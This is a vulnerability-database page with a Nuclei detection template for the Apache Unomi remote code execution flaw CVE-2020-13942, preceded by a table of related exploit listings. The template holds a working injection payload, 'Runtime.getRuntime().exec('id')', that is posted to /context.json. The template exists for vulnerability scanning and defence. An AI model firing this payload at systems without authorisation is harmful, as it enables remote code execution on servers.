| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
| Exploit for Improper Input Validation in Apache Unomi | 11 Jan 202115:50 | – | githubexploit | |
| Exploit for Improper Input Validation in Apache Unomi | 20 Nov 202023:25 | – | githubexploit | |
| Exploit for CVE-2020-11975 | 24 Nov 202005:23 | – | githubexploit | |
| Exploit for Improper Input Validation in Apache Unomi | 21 Nov 202008:48 | – | githubexploit | |
| Exploit for Improper Input Validation in Apache Unomi | 5 Sep 202116:39 | – | githubexploit | |
| Exploit for Improper Input Validation in Apache Unomi | 19 Nov 202008:22 | – | githubexploit | |
| Exploit for Improper Input Validation in Apache Unomi | 24 Jan 202119:01 | – | gitee | |
| Exploit for Authentication Bypass Using an Alternate Path or Channel in Solarwinds Orion_Platform | 20 Oct 202110:39 | – | gitee | |
| Apache Unomi RCE (Direct Check) | 14 Jan 202100:00 | – | nessus | |
| CVE-2020-13942 | 23 Nov 202003:53 | – | circl |
id: CVE-2020-13942
info:
name: Apache Unomi <1.5.2 - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
Apache Unomi allows conditions to use OGNL and MVEL scripting which
offers the possibility to call static Java classes from the JDK
that could execute code with the permission level of the running Java process.
This vulnerability affects all versions of Apache Unomi prior to 1.5.2.
impact: |
Successful exploitation of this vulnerability can allow an attacker to execute arbitrary code on the affected server.
remediation: Apache Unomi users should upgrade to 1.5.2 or later.
reference:
- https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
- https://twitter.com/chybeta/status/1328912309440311297
- https://nvd.nist.gov/vuln/detail/CVE-2020-13942
- http://unomi.apache.org./security/cve-2020-13942.txt
- https://lists.apache.org/thread.html/r4a8fa91836687eaca42b5420a778ca8c8fd3a3740e4cf4401acc9118@%3Cusers.unomi.apache.org%3E
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-13942
cwe-id: CWE-74,CWE-20
epss-score: 0.68398
epss-percentile: 0.9925
cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: unomi
tags: cve,cve2020,apache,rce,vkev,vuln
variables:
id: "{{to_lower(rand_text_alpha(5))}}"
http:
- method: POST
path:
- "{{BaseURL}}/context.json"
body: |
{
"filters": [
{
"id": "{{id}}",
"filters": [
{
"condition": {
"parameterValues": {
"nuclei": "script::Runtime.getRuntime().exec('id')"
},
"type": "profilePropertyCondition"
}
}
]
}
],
"sessionId": "nuclei"
}
headers:
Content-Type: "application/json"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- "context-profile-id"
condition: and
- type: regex
part: body
regex:
- "(profile|session)(Id|Properties|Segments)"
- "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100b3bf79607968c3d58e1278133acfa1a44cc22c8e033dc1f7201a56b965117ed8022100e80814ead0c683bf05521bb2d8efae395745ed388f7b8888d8b7ea053f49a84f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation